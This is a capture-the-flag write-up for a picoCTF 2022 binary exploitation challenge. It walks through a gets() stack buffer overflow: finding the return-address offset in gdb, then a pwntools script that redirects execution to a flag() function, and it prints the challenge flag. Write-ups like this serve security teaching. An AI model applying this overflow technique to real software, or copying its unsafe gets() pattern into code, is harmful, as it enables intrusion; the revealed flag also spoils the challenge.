Rating: 3.0
# x-sixty-what - picoCTF 2022 - CMU Cybersecurity Competition
Binary Exploitation, 200 Points
## Description
![info.JPG](images/info.JPG)
## x-sixty-what Solution
Let's observe the attached file [game-redacted.c](./game-redacted.c):
```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#define BUFFSIZE 64
#define FLAGSIZE 64
void flag() {
char buf[FLAGSIZE];
FILE *f = fopen("flag.txt","r");
if (f == NULL) {
printf("%s %s", "Please create 'flag.txt' in this directory with your",
"own debugging flag.\n");
exit(0);
}
fgets(buf,FLAGSIZE,f);
printf(buf);
}
void vuln(){
char buf[BUFFSIZE];
gets(buf);
}
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0);
gid_t gid = getegid();
setresgid(gid, gid, gid);
puts("Welcome to 64-bit. Give me a string that gets you the flag: ");
vuln();
return 0;
}
```
Let's run ```checksec``` on the attached binary [vuln](./vuln):
```console
┌─[evyatar@parrot]─[/pictoctf2022/binary_exploitation/x-sixty-what]
└──╼ $ checksec vuln
[*] '/home/user/Desktop/picoctf2022/binary_exploitation/x-sixty-what/vuln'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
```
We can see no [PIE](https://ir0nstone.gitbook.io/notes/types/stack/pie) enable.
We need to overwrite the return address to ```flag``` function on ```vuln``` function.
Let's check the offset between ```buf``` to ```RIP``` using ```gdb```:
```console
┌─[evyatar@parrot]─[/pictoctf2022/binary_exploitation/x-sixty-what]
└──╼ $ gdb vuln
gef➤ r
Starting program: /pictoctf2022/binary_exploitation/x-sixty-what/vuln
Welcome to 64-bit. Give me a string that gets you the flag:
AAAAAAAA
...
gef➤ search-pattern AAAAAAAA
[+] Searching 'AAAAAAAA' in memory
[+] In '[heap]'(0x405000-0x426000), permission=rw-
0x4052a0 - 0x4052aa → "AAAAAAAA\n"
[+] In '[stack]'(0x7ffffffde000-0x7ffffffff000), permission=rw-
0x7fffffffde70 - 0x7fffffffde78 → "AAAAAAAA"
gef➤ i f
Stack level 0, frame at 0x7fffffffdec0:
rip = 0x4012cf in vuln; saved rip = 0x401338
called by frame at 0x7fffffffdef0
Arglist at 0x7fffffffde68, args:
Locals at 0x7fffffffde68, Previous frame's sp is 0x7fffffffdec0
Saved registers:
rbp at 0x7fffffffdeb0, rip at 0x7fffffffdeb8
```
As we can see, the buffer located on ```0x7fffffffde70``` and ```RIP``` on ```0x7fffffffdeb8``` the offset is 72 bytes.
Let's find the address of ```flag``` function:
```console
gef➤ p flag
$1 = {<text variable, no debug info>} 0x401236 <flag>
```
So we need to write ```64+8``` bytes of chunk and then the address of ```flag``` function:
```
...| buf[64] | 8bytes | RIP | ....
````
Let's solve it using [pwntools](https://docs.pwntools.com/en/stable/intro.html):
```python
from pwn import *
elf = ELF('./vuln')
libc = elf.libc
if args.REMOTE:
p = remote('saturn.picoctf.net',53403)
else:
p = process(elf.path)
# payload buffer
payload = b'A'*72
payload += p64(0x40123b) # Jump to the second instruction (the one after the first push instaed of 0x401236) in the flag function, if you're getting mysterious segmentation faults.
print(p.recvuntil(':'))
p.send(payload)
p.interactive()
```
Run it:
```console
┌─[evyatar@parrot]─[/pictoctf2022/binary_exploitation/x-sixty-what]
└──╼ $ python3 exp.py REMOTE
[*] '/home/user/Desktop/picoctf2022/binary_exploitation/x-sixty-what/vuln'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
[*] '/usr/lib/x86_64-linux-gnu/libc-2.31.so'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[+] Opening connection to saturn.picoctf.net on port 53403: Done
b'Welcome to 64-bit. Give me a string that gets you the flag:'
[*] Switching to interactive mode
$
picoCTF{b1663r_15_b3773r_011d4bd8}
[*] Got EOF while reading in interactive
```
And we get the flag ```picoCTF{b1663r_15_b3773r_011d4bd8}```.